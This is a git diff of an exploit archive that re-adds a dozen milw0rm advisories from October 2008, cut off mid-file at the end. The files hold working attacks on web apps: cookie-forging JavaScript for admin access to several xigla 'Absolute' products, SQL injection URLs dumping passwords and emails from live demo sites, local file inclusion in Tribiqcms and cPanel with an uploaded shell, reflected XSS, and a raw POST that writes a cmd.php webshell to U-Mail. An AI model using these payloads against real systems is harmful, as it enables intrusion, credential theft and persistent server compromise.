@@ -1,34 +1,34 @@ - _____ ____ __ __ _ ____ ____ ____ -|_ _| | _ \ \ \ / / / \ / ___| / ___| / ___| - | | | |_) | \ V / / _ \ | | _ | | | | - | | | _ < | | / ___ \ | |_| | _ | |___ | |___ - |_| |_| \_\ |_| /_/ \_\ \____| (_) \____| \____| - - -Tribiqcms 5.0.10a (beta) Local File Inclusion Vulnerability - -Vuln Code In : /Community-5.0.10a/templates/mytribiqsite/tribal-GPL-1066/includes/header.inc.php - - - -POC : -/templates/mytribiqsite/tribal-GPL-1066/includes/header.inc.php?template_path=Local File %00 - - ____ _ _ __ __ - / ___| ___ | | __| | | \/ | - | | _ / _ \ | | / _` | | |\/| | - | |_| | | (_) | | |___ | (_| | | | | | - \____| \___/ |_____| \__,_| _____ |_| |_| - |_____| - -# milw0rm.com [2008-10-31] + _____ ____ __ __ _ ____ ____ ____ +|_ _| | _ \ \ \ / / / \ / ___| / ___| / ___| + | | | |_) | \ V / / _ \ | | _ | | | | + | | | _ < | | / ___ \ | |_| | _ | |___ | |___ + |_| |_| \_\ |_| /_/ \_\ \____| (_) \____| \____| + + +Tribiqcms 5.0.10a (beta) Local File Inclusion Vulnerability + +Vuln Code In : /Community-5.0.10a/templates/mytribiqsite/tribal-GPL-1066/includes/header.inc.php + + + +POC : +/templates/mytribiqsite/tribal-GPL-1066/includes/header.inc.php?template_path=Local File %00 + + ____ _ _ __ __ + / ___| ___ | | __| | | \/ | + | | _ / _ \ | | / _` | | |\/| | + | |_| | | (_) | | |___ | (_| | | | | | + \____| \___/ |_____| \__,_| _____ |_| |_| + |_____| + +# milw0rm.com [2008-10-31] diff --git a/platforms/php/webapps/6889.txt b/platforms/php/webapps/6889.txt index 4a78badce..d6f43e30f 100755 --- a/platforms/php/webapps/6889.txt +++ b/platforms/php/webapps/6889.txt 
@@ -1,25 +1,25 @@ -############################################################################################### - _____ ____ __ ___ ______ ______ | ____ _____ _____ -| / ___| \ \ / / / ____| / | | | | _ \ | -|_____ | | _ \ V / | | | | ___| |_____ | |_) | |_____ -| | |_ || | | | |____ | | | | | | _ | | -|_____ \____| |_| \_____| \_____/ |___| |____ |__| \_\ ______| - -[~] Author : Hakxer -[~] Home : Www.educ-up.com -[~] Type Gap : Insecure Cookie Handling -[~] script : Absolute Content Rotator 6.0 [see script] http://www.xigla.com/absolutecr/demo.htm -[~] Team : EgY Coders -################################################################################################# - -Exploit : First go to http://www.xigla.com/absolutecr/demo/login.aspx -Second Execute -[~] javascript:document.cookie="xlaACRDEMOuser=userid=1&lvl=1&s="; -Now Go to http://www.xigla.com/absolutecr/demo/menu.aspx - - ---- Proud To Be A Muslim --- - -# _=END=_ # - -# milw0rm.com [2008-10-31] +############################################################################################### + _____ ____ __ ___ ______ ______ | ____ _____ _____ +| / ___| \ \ / / / ____| / | | | | _ \ | +|_____ | | _ \ V / | | | | ___| |_____ | |_) | |_____ +| | |_ || | | | |____ | | | | | | _ | | +|_____ \____| |_| \_____| \_____/ |___| |____ |__| \_\ ______| + +[~] Author : Hakxer +[~] Home : Www.educ-up.com +[~] Type Gap : Insecure Cookie Handling +[~] script : Absolute Content Rotator 6.0 [see script] http://www.xigla.com/absolutecr/demo.htm +[~] Team : EgY Coders +################################################################################################# + +Exploit : First go to http://www.xigla.com/absolutecr/demo/login.aspx +Second Execute +[~] javascript:document.cookie="xlaACRDEMOuser=userid=1&lvl=1&s="; +Now Go to http://www.xigla.com/absolutecr/demo/menu.aspx + + +--- Proud To Be A Muslim --- + +# _=END=_ # + +# milw0rm.com [2008-10-31] 
diff --git a/platforms/php/webapps/6890.txt b/platforms/php/webapps/6890.txt
index 91838ccd8..692472c1b 100755
--- a/platforms/php/webapps/6890.txt
+++ b/platforms/php/webapps/6890.txt
@@ -1,24 +1,24 @@ -############################################################################################### - _____ ____ __ ___ ______ ______ | ____ _____ _____ -| / ___| \ \ / / / ____| / | | | | _ \ | -|_____ | | _ \ V / | | | | ___| |_____ | |_) | |_____ -| | |_ || | | | |____ | | | | | | _ | | -|_____ \____| |_| \_____| \_____/ |___| |____ |__| \_\ ______| - -[~] Author : Hakxer -[~] Home : Www.educ-up.com -[~] Type Gap : Insecure Cookie Handling -[~] script : Absolute Banner Manager [see script] http://www.xigla.com/absolutebmnet/demo.htm -[~] Team : EgY Coders -################################################################################################# - -Exploit : First go to http://www.xigla.com/absolutebmnet/demo/login.aspx -Second Execute JS Code -[~] javascript:document.cookie="xlaABM_usr=userid=administrator&company=Sytem Administrator"; -Now Go to http://www.xigla.com/absolutebmnet/demo/menu.aspx - ---- Proud To Be A Muslim --- - -# _=END=_ # - -# milw0rm.com [2008-10-31] +############################################################################################### + _____ ____ __ ___ ______ ______ | ____ _____ _____ +| / ___| \ \ / / / ____| / | | | | _ \ | +|_____ | | _ \ V / | | | | ___| |_____ | |_) | |_____ +| | |_ || | | | |____ | | | | | | _ | | +|_____ \____| |_| \_____| \_____/ |___| |____ |__| \_\ ______| + +[~] Author : Hakxer +[~] Home : Www.educ-up.com +[~] Type Gap : Insecure Cookie Handling +[~] script : Absolute Banner Manager [see script] http://www.xigla.com/absolutebmnet/demo.htm +[~] Team : EgY Coders +################################################################################################# + +Exploit : First go to http://www.xigla.com/absolutebmnet/demo/login.aspx +Second Execute JS Code +[~] javascript:document.cookie="xlaABM_usr=userid=administrator&company=Sytem Administrator"; +Now Go to http://www.xigla.com/absolutebmnet/demo/menu.aspx + +--- Proud To Be A Muslim --- + +# _=END=_ # + +# milw0rm.com 
[2008-10-31]
diff --git a/platforms/php/webapps/6891.txt b/platforms/php/webapps/6891.txt
index 6ef293869..d172e29f8 100755
--- a/platforms/php/webapps/6891.txt
+++ b/platforms/php/webapps/6891.txt
@@ -1,24 +1,24 @@ -############################################################################################### - _____ ____ __ ___ ______ ______ | ____ _____ _____ -| / ___| \ \ / / / ____| / | | | | _ \ | -|_____ | | _ \ V / | | | | ___| |_____ | |_) | |_____ -| | |_ || | | | |____ | | | | | | _ | | -|_____ \____| |_| \_____| \_____/ |___| |____ |__| \_\ ______| - -[~] Author : Hakxer -[~] Home : Www.educ-up.com -[~] Type Gap : Insecure Cookie Handling -[~] script : Absolute Form Processor [see script] http://www.xigla.com/absolutefpnet/demo.htm -[~] Team : EgY Coders -################################################################################################# - -Exploit : First go to http://www.xigla.com/absolutefpnet/demo/login.aspx -Second Execute JS Code -[~] javascript:document.cookie="xlaAFPDEMOadmin=userid=1&lvl=1&createforms=checked"; -Now Go to http://www.xigla.com/absolutefpnet/demo/menu.aspx - ---- Proud To Be A Muslim --- - -# _=END=_ # - -# milw0rm.com [2008-10-31] +############################################################################################### + _____ ____ __ ___ ______ ______ | ____ _____ _____ +| / ___| \ \ / / / ____| / | | | | _ \ | +|_____ | | _ \ V / | | | | ___| |_____ | |_) | |_____ +| | |_ || | | | |____ | | | | | | _ | | +|_____ \____| |_| \_____| \_____/ |___| |____ |__| \_\ ______| + +[~] Author : Hakxer +[~] Home : Www.educ-up.com +[~] Type Gap : Insecure Cookie Handling +[~] script : Absolute Form Processor [see script] http://www.xigla.com/absolutefpnet/demo.htm +[~] Team : EgY Coders +################################################################################################# + +Exploit : First go to http://www.xigla.com/absolutefpnet/demo/login.aspx +Second Execute JS Code +[~] javascript:document.cookie="xlaAFPDEMOadmin=userid=1&lvl=1&createforms=checked"; +Now Go to http://www.xigla.com/absolutefpnet/demo/menu.aspx + +--- Proud To Be A Muslim --- + +# _=END=_ # + +# milw0rm.com [2008-10-31] 
diff --git a/platforms/php/webapps/6892.txt b/platforms/php/webapps/6892.txt
index fc2bdf4bd..c34b0587c 100755
--- a/platforms/php/webapps/6892.txt
+++ b/platforms/php/webapps/6892.txt
@@ -1,25 +1,25 @@ -############################################################################################### - _____ ____ __ ___ ______ ______ | ____ _____ _____ -| / ___| \ \ / / / ____| / | | | | _ \ | -|_____ | | _ \ V / | | | | ___| |_____ | |_) | |_____ -| | |_ || | | | |____ | | | | | | _ | | -|_____ \____| |_| \_____| \_____/ |___| |____ |__| \_\ ______| - -[~] Discovered By: Hakxer -[~] Home : Www.educ-up.com -[~] Type Gap : Insecure Cookie Handling -[~] script : Absolute Live Support [see script] http://www.xigla.com/absolutelsnet/demo.htm -[~] Greetz : Allah , Egyptian x hacker , All my team , All educ-up Member -[~] Team : EgY Coders -################################################################################################# - -Exploit : First go to http://www.xigla.com/absolutelsnet/demo/login.aspx -Second Execute JS Code -[~] javascript:document.cookie="xlaALSDEMOadmin=userid=1&lvl=1&nick=admin&mywelcome=Hi, How may I help you"; -Now Go to http://www.xigla.com/absolutelsnet/demo/menu.aspx - ---- Proud To Be A Muslim --- - -# _=END=_ # - -# milw0rm.com [2008-10-31] +############################################################################################### + _____ ____ __ ___ ______ ______ | ____ _____ _____ +| / ___| \ \ / / / ____| / | | | | _ \ | +|_____ | | _ \ V / | | | | ___| |_____ | |_) | |_____ +| | |_ || | | | |____ | | | | | | _ | | +|_____ \____| |_| \_____| \_____/ |___| |____ |__| \_\ ______| + +[~] Discovered By: Hakxer +[~] Home : Www.educ-up.com +[~] Type Gap : Insecure Cookie Handling +[~] script : Absolute Live Support [see script] http://www.xigla.com/absolutelsnet/demo.htm +[~] Greetz : Allah , Egyptian x hacker , All my team , All educ-up Member +[~] Team : EgY Coders +################################################################################################# + +Exploit : First go to http://www.xigla.com/absolutelsnet/demo/login.aspx +Second Execute JS Code +[~] 
javascript:document.cookie="xlaALSDEMOadmin=userid=1&lvl=1&nick=admin&mywelcome=Hi, How may I help you"; +Now Go to http://www.xigla.com/absolutelsnet/demo/menu.aspx + +--- Proud To Be A Muslim --- + +# _=END=_ # + +# milw0rm.com [2008-10-31] diff --git a/platforms/php/webapps/6893.txt b/platforms/php/webapps/6893.txt index 48418ac3b..b5c1d19c9 100755 --- a/platforms/php/webapps/6893.txt +++ b/platforms/php/webapps/6893.txt 
@@ -1,25 +1,25 @@ -############################################################################################### - _____ ____ __ ___ ______ ______ | ____ _____ _____ -| / ___| \ \ / / / ____| / | | | | _ \ | -|_____ | | _ \ V / | | | | ___| |_____ | |_) | |_____ -| | |_ || | | | |____ | | | | | | _ | | -|_____ \____| |_| \_____| \_____/ |___| |____ |__| \_\ ______| - -[~] Discovered By : Hakxer -[~] Home : Www.educ-up.com -[~] Type Gap : Insecure Cookie Handling -[~] script : Absolute Control Panel XE [see script] http://www.xigla.com/absolutecp/demo.htm -[~] Greetz : Allah , Egyptian x hacker , All my team , All educ-up Member -[~] Team : EgY Coders -################################################################################################# - -Exploit : First go to http://www.xigla.com/absolutecp/xlaabsolutecp/login.asp -Second Execute JS Code -[~] javascript:document.cookie="xlaCPadmin=lvl=1&email=email@here.com&pwd=admin&usr=admin&userid=1"; -Now Go to http://www.xigla.com/absolutecp/xlaabsolutecp/menu.asp - ---- Proud To Be A Muslim --- - -# _=END=_ # - -# milw0rm.com [2008-10-31] +############################################################################################### + _____ ____ __ ___ ______ ______ | ____ _____ _____ +| / ___| \ \ / / / ____| / | | | | _ \ | +|_____ | | _ \ V / | | | | ___| |_____ | |_) | |_____ +| | |_ || | | | |____ | | | | | | _ | | +|_____ \____| |_| \_____| \_____/ |___| |____ |__| \_\ ______| + +[~] Discovered By : Hakxer +[~] Home : Www.educ-up.com +[~] Type Gap : Insecure Cookie Handling +[~] script : Absolute Control Panel XE [see script] http://www.xigla.com/absolutecp/demo.htm +[~] Greetz : Allah , Egyptian x hacker , All my team , All educ-up Member +[~] Team : EgY Coders +################################################################################################# + +Exploit : First go to http://www.xigla.com/absolutecp/xlaabsolutecp/login.asp +Second Execute JS Code +[~] 
javascript:document.cookie="xlaCPadmin=lvl=1&email=email@here.com&pwd=admin&usr=admin&userid=1"; +Now Go to http://www.xigla.com/absolutecp/xlaabsolutecp/menu.asp + +--- Proud To Be A Muslim --- + +# _=END=_ # + +# milw0rm.com [2008-10-31] diff --git a/platforms/php/webapps/6894.txt b/platforms/php/webapps/6894.txt index 5243215aa..e2e0bc9aa 100755 --- a/platforms/php/webapps/6894.txt +++ b/platforms/php/webapps/6894.txt 
@@ -1,24 +1,23 @@ - -================================================================================== - SFS EZ Gaming Directory (directory.php id) Remote SQL Injection Vulnerability -================================================================================== - __ __ __ - / / / /_ _______/ /__ __ __ - / /_/ / / / / ___/ / _ \/ / / / - / __ / /_/ / / / / __/ /_/ / - /_/ /_/\__,_/_/ /_/\___/\__, / - /____/ -================================================================================== ----------------------------------------------------------------------------------- -Website script: http://www.scripts-for-sites.info/index.php ----------------------------------------------------------------------------------- -Exploit: http://localHost/gaming/directory.php?ax=list&l=list_by&cat_id=[exploit] ----------------------------------------------------------------------------------- -LiveDemo: -http://www.turnkeyzone.com/demos/gaming/directory.php?ax=list&l=list_by&cat_id=1/**/union/**/all/**/select/**/1,2,concat_ws(0x3a,password,email),4,5,6,7,8,9,10,11,12,13/**/from/**/links/* ----------------------------------------------------------------------------------- -================================================================================== -Special Thx : Darckc0de -================================================================================== - -# milw0rm.com [2008-10-31] +================================================================================== + SFS EZ Gaming Directory (directory.php id) Remote SQL Injection Vulnerability +================================================================================== + __ __ __ + / / / /_ _______/ /__ __ __ + / /_/ / / / / ___/ / _ \/ / / / + / __ / /_/ / / / / __/ /_/ / + /_/ /_/\__,_/_/ /_/\___/\__, / + /____/ +================================================================================== +---------------------------------------------------------------------------------- +Website script: 
http://www.scripts-for-sites.info/index.php +---------------------------------------------------------------------------------- +Exploit: http://localHost/gaming/directory.php?ax=list&l=list_by&cat_id=[exploit] +---------------------------------------------------------------------------------- +LiveDemo: +http://www.turnkeyzone.com/demos/gaming/directory.php?ax=list&l=list_by&cat_id=1/**/union/**/all/**/select/**/1,2,concat_ws(0x3a,password,email),4,5,6,7,8,9,10,11,12,13/**/from/**/links/* +---------------------------------------------------------------------------------- +================================================================================== +Special Thx : Darckc0de +================================================================================== + +# milw0rm.com [2008-10-31] diff --git a/platforms/php/webapps/6895.txt b/platforms/php/webapps/6895.txt index b30cf2bef..3bebfbaa6 100755 --- a/platforms/php/webapps/6895.txt +++ b/platforms/php/webapps/6895.txt 
@@ -1,24 +1,23 @@ - -================================================================================== - SFS EZ Adult Directory (directory.php id) Remote SQL Injection Vulnerability -================================================================================== - __ __ __ - / / / /_ _______/ /__ __ __ - / /_/ / / / / ___/ / _ \/ / / / - / __ / /_/ / / / / __/ /_/ / - /_/ /_/\__,_/_/ /_/\___/\__, / - /____/ -================================================================================== ----------------------------------------------------------------------------------- -Website script: http://www.scripts-for-sites.info/index.php ----------------------------------------------------------------------------------- -Exploit: http://localHost/gaming/directory.php?ax=list&l=list_by&cat_id=[exploit] ----------------------------------------------------------------------------------- -LiveDemo: -http://turnkeyzone.com/demos/adultdir/directory.php?ax=list&sub=6&cat_id=1/**/union/**/all/**/select/**/1,2,concat_ws(0x3a,password,email),4,5,6,7,8,9,10,11,12,13/**/from/**/links/* ----------------------------------------------------------------------------------- -================================================================================== -Special Thx : Darckc0de -================================================================================== - -# milw0rm.com [2008-10-31] +================================================================================== + SFS EZ Adult Directory (directory.php id) Remote SQL Injection Vulnerability +================================================================================== + __ __ __ + / / / /_ _______/ /__ __ __ + / /_/ / / / / ___/ / _ \/ / / / + / __ / /_/ / / / / __/ /_/ / + /_/ /_/\__,_/_/ /_/\___/\__, / + /____/ +================================================================================== +---------------------------------------------------------------------------------- +Website script: 
http://www.scripts-for-sites.info/index.php +---------------------------------------------------------------------------------- +Exploit: http://localHost/gaming/directory.php?ax=list&l=list_by&cat_id=[exploit] +---------------------------------------------------------------------------------- +LiveDemo: +http://turnkeyzone.com/demos/adultdir/directory.php?ax=list&sub=6&cat_id=1/**/union/**/all/**/select/**/1,2,concat_ws(0x3a,password,email),4,5,6,7,8,9,10,11,12,13/**/from/**/links/* +---------------------------------------------------------------------------------- +================================================================================== +Special Thx : Darckc0de +================================================================================== + +# milw0rm.com [2008-10-31] diff --git a/platforms/php/webapps/6896.txt b/platforms/php/webapps/6896.txt index 91bda3e79..c6a18d393 100755 --- a/platforms/php/webapps/6896.txt +++ b/platforms/php/webapps/6896.txt 
@@ -1,55 +1,55 @@ -[~] Logz podcast CMS version 1.3.1 Remote sql inj -[~] -[~] download: http://sourceforge.net/project/showfiles.php?group_id=107225&package_id=178479&release_id=635701 -[~] -[~] ---------------------------------------------------------- -[~] Discovered By: ZoRLu -[~] -[~] Date: 31.10.2008 -[~] -[~] Home: www.z0rlu.blogspot.com -[~] -[~] contact: trt-turk@hotmail.com -[~] -[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( -[~] -[~] N0T: a.q kpss : ) ) -[~] -[~] ----------------------------------------------------------- - -file: - -fichiers/add_url.php - -code: - - if (isset($_GET['art'])) { - $Article = $_GET['art']; - - ... - - $Requete = "SELECT TITRE FROM ".TABLEARTICLES." WHERE ID = '".$Article."' ".$Conditions; - $ResultRequete = requete_mysql($Requete); - - - -Exploit: - -http://localhost/script_path/fichiers/add_url.php?art=[SQL] - -[SQL]= column number 1 (SELECT TITRE FROM ...) - -1'+union+select+concat(user(),0x3a,database())/* - -example: - -http://example.com/scripth_path/fichiers/add_url.php?art=1'+union+select+concat(user(),0x3a,database())/* - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke & all Muslim HaCkeRs -[~] -[~] yildirimordulari.org & darkc0de.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2008-10-31] +[~] Logz podcast CMS version 1.3.1 Remote sql inj +[~] +[~] download: http://sourceforge.net/project/showfiles.php?group_id=107225&package_id=178479&release_id=635701 +[~] +[~] ---------------------------------------------------------- +[~] Discovered By: ZoRLu +[~] +[~] Date: 31.10.2008 +[~] +[~] Home: www.z0rlu.blogspot.com +[~] +[~] contact: trt-turk@hotmail.com +[~] +[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( +[~] +[~] N0T: a.q kpss : ) ) +[~] +[~] ----------------------------------------------------------- + +file: + +fichiers/add_url.php + +code: + + if (isset($_GET['art'])) { + $Article = 
$_GET['art']; + + ... + + $Requete = "SELECT TITRE FROM ".TABLEARTICLES." WHERE ID = '".$Article."' ".$Conditions; + $ResultRequete = requete_mysql($Requete); + + + +Exploit: + +http://localhost/script_path/fichiers/add_url.php?art=[SQL] + +[SQL]= column number 1 (SELECT TITRE FROM ...) + +1'+union+select+concat(user(),0x3a,database())/* + +example: + +http://example.com/scripth_path/fichiers/add_url.php?art=1'+union+select+concat(user(),0x3a,database())/* + +[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke & all Muslim HaCkeRs +[~] +[~] yildirimordulari.org & darkc0de.com +[~] +[~]---------------------------------------------------------------------- + +# milw0rm.com [2008-10-31] diff --git a/platforms/php/webapps/6897.txt b/platforms/php/webapps/6897.txt index 4f61a3b97..40681361e 100755 --- a/platforms/php/webapps/6897.txt +++ b/platforms/php/webapps/6897.txt 
@@ -1,66 +1,66 @@ ----------------------------------------------------------------- - -Script : Cpanel 11.x - -Type : Local File Inclusion & Cross Site Scripting - -Risk : High - ----------------------------------------------------------------- - -Discovered by : Khashayar Fereidani - -**** I am 17 Years Old **** - -My Official Website : HTTP://FEREIDANI.IR - -Team Website : Http://IRCRASH.COM - -Team Members : Khashayar Fereidani - Hadi Kiamarsi - Sina YazdanMehr - -Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com - ----------------------------------------------------------------- - -Local File Inclusion Vulnerability : - -Note : Rename your shell to config.php and upload with your ftp account in ./ directory .... , now login in cpanel and - enter vulnerable address in url .... - - -https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhead&scriptpath_show=/home/[youruser]/ - -https://ServerIp:2083/frontend/x2/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhead&scriptpath_show=/home/[youruser]/ - -https://ServerIp:2083/frontend/x/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhead&scriptpath_show=/home/[youruser]/ - ----------------------------------------------------------------- - -Cross site scripting : - -File Address : frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade%20to%201.7.4 - -Set Action as Upgrade%20to%201.7.4 - -Vulnerable Variables : - -$localapp -$updatedir -$scriptpath_show -$domain_show -$thispage -$thisapp -$currentversion - -For Example : https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade%20to%201.7.4&localapp=%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E - - ----------------------------------------------------------------- - - Tnx : God - - HTTP://IRCRASH.COM HTTP://FEREIDANI.IR - ----------------------------------------------------------------- - -# milw0rm.com [2008-10-31] 
+---------------------------------------------------------------- + +Script : Cpanel 11.x + +Type : Local File Inclusion & Cross Site Scripting + +Risk : High + +---------------------------------------------------------------- + +Discovered by : Khashayar Fereidani + +**** I am 17 Years Old **** + +My Official Website : HTTP://FEREIDANI.IR + +Team Website : Http://IRCRASH.COM + +Team Members : Khashayar Fereidani - Hadi Kiamarsi - Sina YazdanMehr + +Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com + +---------------------------------------------------------------- + +Local File Inclusion Vulnerability : + +Note : Rename your shell to config.php and upload with your ftp account in ./ directory .... , now login in cpanel and + enter vulnerable address in url .... + + +https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhead&scriptpath_show=/home/[youruser]/ + +https://ServerIp:2083/frontend/x2/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhead&scriptpath_show=/home/[youruser]/ + +https://ServerIp:2083/frontend/x/fantastico/autoinstall4imagesgalleryupgrade.php?action=GoAhead&scriptpath_show=/home/[youruser]/ + +---------------------------------------------------------------- + +Cross site scripting : + +File Address : frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade%20to%201.7.4 + +Set Action as Upgrade%20to%201.7.4 + +Vulnerable Variables : + +$localapp +$updatedir +$scriptpath_show +$domain_show +$thispage +$thisapp +$currentversion + +For Example : https://ServerIp:2083/frontend/x3/fantastico/autoinstall4imagesgalleryupgrade.php?action=Upgrade%20to%201.7.4&localapp=%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E + + +---------------------------------------------------------------- + + Tnx : God + + HTTP://IRCRASH.COM HTTP://FEREIDANI.IR + +---------------------------------------------------------------- + +# milw0rm.com [2008-10-31] 
diff --git a/platforms/php/webapps/6898.txt b/platforms/php/webapps/6898.txt index 37a116deb..08e0cc688 100755 --- a/platforms/php/webapps/6898.txt +++ b/platforms/php/webapps/6898.txt 
@@ -1,36 +1,36 @@ -U-Mail Webmail Arbitrary File Write Vulnerability - -================================================== - -Vulnerable: U-Mail 4.91 -Vendors: www.comingchina.com -Category: Input Validation Error -Impact: An attacker can write arbitrary data to new files. -Author: Shennan Wang -Date: 2008-10-30 -Web: http://hi.baidu.com/nansec - - -Details: -========= -This vulnerability allows remote attackers to write arbitrary file on vulnerable installations of U-Mail Webmail Server. Authentication is required to exploit this vulnerability.The specific flaw exists in the 'edit.php' file running on the U-Mail Webmail Server. A malicious HTTP POST request can write arbitrary file to the publicly accessible web directories. - - -Exploit: -========= -POST /webmail/modules/filesystem/edit.php HTTP/1.1 -Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-silverlight, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */* -Referer: http://mail.d4rkn3t.cn/webmail/modules/filesystem/edit.php -Accept-Language: zh-cn -Content-Type: application/x-www-form-urlencoded -Accept-Encoding: gzip, deflate -User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) -Host: mail.d4rkn3t.cn -Content-Length: 120 -Connection: Keep-Alive -Cache-Control: no-cache -Cookie: GO_AUTH_SOURCE_KEY=0; LANGUAGE_CK=zh_CN; SCREEN_CK=Default+Style; PHPSESSID=0fa330ffdfd62d9e1bd8bd3942974a18 - -path=/var/www/htdocs/webmail/cmd.php&task=save&name=cmd.php&content= - -# milw0rm.com [2008-10-31] +U-Mail Webmail Arbitrary File Write Vulnerability + +================================================== + +Vulnerable: U-Mail 4.91 +Vendors: www.comingchina.com +Category: Input Validation Error +Impact: An attacker can write arbitrary data to new files. 
+Author: Shennan Wang +Date: 2008-10-30 +Web: http://hi.baidu.com/nansec + + +Details: +========= +This vulnerability allows remote attackers to write arbitrary file on vulnerable installations of U-Mail Webmail Server. Authentication is required to exploit this vulnerability.The specific flaw exists in the 'edit.php' file running on the U-Mail Webmail Server. A malicious HTTP POST request can write arbitrary file to the publicly accessible web directories. + + +Exploit: +========= +POST /webmail/modules/filesystem/edit.php HTTP/1.1 +Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-silverlight, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */* +Referer: http://mail.d4rkn3t.cn/webmail/modules/filesystem/edit.php +Accept-Language: zh-cn +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip, deflate +User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30) +Host: mail.d4rkn3t.cn +Content-Length: 120 +Connection: Keep-Alive +Cache-Control: no-cache +Cookie: GO_AUTH_SOURCE_KEY=0; LANGUAGE_CK=zh_CN; SCREEN_CK=Default+Style; PHPSESSID=0fa330ffdfd62d9e1bd8bd3942974a18 + +path=/var/www/htdocs/webmail/cmd.php&task=save&name=cmd.php&content= + +# milw0rm.com [2008-10-31] diff --git a/platforms/php/webapps/6900.txt b/platforms/php/webapps/6900.txt index 59f6048ff..9f35cf30d 100755 --- a/platforms/php/webapps/6900.txt +++ b/platforms/php/webapps/6900.txt 
@@ -1,13 +1,13 @@
-#################################################################################
-## Discovered by : Hakxer #
-## Script : Absolute News Manager :http://www.xigla.com/absolutenmnet/demo.htm #
-## Greetz : Allah , Egyptian x Hacker , SQL_Inj4ct0r , Stealth , All my team #
-## Team : EgY Coders Team #
-## ----------------------------Start Exploit----------------------------------- #
-## First Go to http://www.xigla.com/absolutenmnet/demo/login.aspx
-## Execute JS Code : javascript:document.cookie="xlaANMadmin_demo=usr=1&lvl=2&uniqueid=&permissions=upload,relate";
-## Second Go to http://www.xigla.com/absolutenmnet/demo/menu.aspx
-## _=END=_
-#############################################################################
-
-# milw0rm.com [2008-10-31]
+#################################################################################
+## Discovered by : Hakxer #
+## Script : Absolute News Manager :http://www.xigla.com/absolutenmnet/demo.htm #
+## Greetz : Allah , Egyptian x Hacker , SQL_Inj4ct0r , Stealth , All my team #
+## Team : EgY Coders Team #
+## ----------------------------Start Exploit----------------------------------- #
+## First Go to http://www.xigla.com/absolutenmnet/demo/login.aspx
+## Execute JS Code : javascript:document.cookie="xlaANMadmin_demo=usr=1&lvl=2&uniqueid=&permissions=upload,relate";
+## Second Go to http://www.xigla.com/absolutenmnet/demo/menu.aspx
+## _=END=_
+#############################################################################
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6901.txt b/platforms/php/webapps/6901.txt
index fef209497..48eb3d466 100755
--- a/platforms/php/webapps/6901.txt
+++ b/platforms/php/webapps/6901.txt
@@ -1,18 +1,18 @@
-########################################################################
-# Discovered by : Hakxer #
-# Script : Absolute News Feed http://www.xigla.com/absolutenf/demo.htm #
-# Greetz : Allah , All My friend ,www.educ-up.com #
-# ------------------------------- #
-# Poc : #
-# javascript:document.cookie="xlaAFSuser=p=admin"; #
-# #
-# [~] Exploit #
-# #
-# Go To admin login : http://www.xigla.com/absolutenf/demo/login.aspx #
-# Execute JS Code : javascript:document.cookie="xlaAFSuser=p=admin"; #
-# Now Go to :http://www.xigla.com/absolutenf/demo/menu.aspx #
-# #
-# Absolute Products .. Crashed ( Insecure Cookie Vulnerability ) #
-########################################################################
-
-# milw0rm.com [2008-10-31]
+########################################################################
+# Discovered by : Hakxer #
+# Script : Absolute News Feed http://www.xigla.com/absolutenf/demo.htm #
+# Greetz : Allah , All My friend ,www.educ-up.com #
+# ------------------------------- #
+# Poc : #
+# javascript:document.cookie="xlaAFSuser=p=admin"; #
+# #
+# [~] Exploit #
+# #
+# Go To admin login : http://www.xigla.com/absolutenf/demo/login.aspx #
+# Execute JS Code : javascript:document.cookie="xlaAFSuser=p=admin"; #
+# Now Go to :http://www.xigla.com/absolutenf/demo/menu.aspx #
+# #
+# Absolute Products .. Crashed ( Insecure Cookie Vulnerability ) #
+########################################################################
+
+# milw0rm.com [2008-10-31]
diff --git a/platforms/php/webapps/6902.txt b/platforms/php/webapps/6902.txt
index cfb6638e6..562459d7a 100755
--- a/platforms/php/webapps/6902.txt
+++ b/platforms/php/webapps/6902.txt
@@ -1,18 +1,18 @@
-#####################################################################################
-# Discovered by : Hakxer #
-# Script : Absolute FAQ Manager http://www.xigla.com/absolutefmnet/demo.htm #
-# Greetz : Allah , All My friend ,www.educ-up.com #
-# ------------------------------- #
-# Poc : #
-# javascript:document.cookie="xlaAFMDEMOadmin=userid=1&lvl=1&s="; #
-# #
-# [~] Exploit #
-# #
-# Go To admin login : http://www.xigla.com/absolutefmnet/demo/login.aspx #
-# Execute JS Code : javascript:document.cookie="xlaAFMDEMOadmin=userid=1&lvl=1&s="; #
-# Now Go to :http://www.xigla.com/absolutefmnet/demo/menu.aspx #
-# #
-# Absolute Products .. Crashed ( Insecure Cookie Vulnerability ) #
-#####################################################################################
-
-# milw0rm.com [2008-10-31]
+#####################################################################################
+# Discovered by : Hakxer #
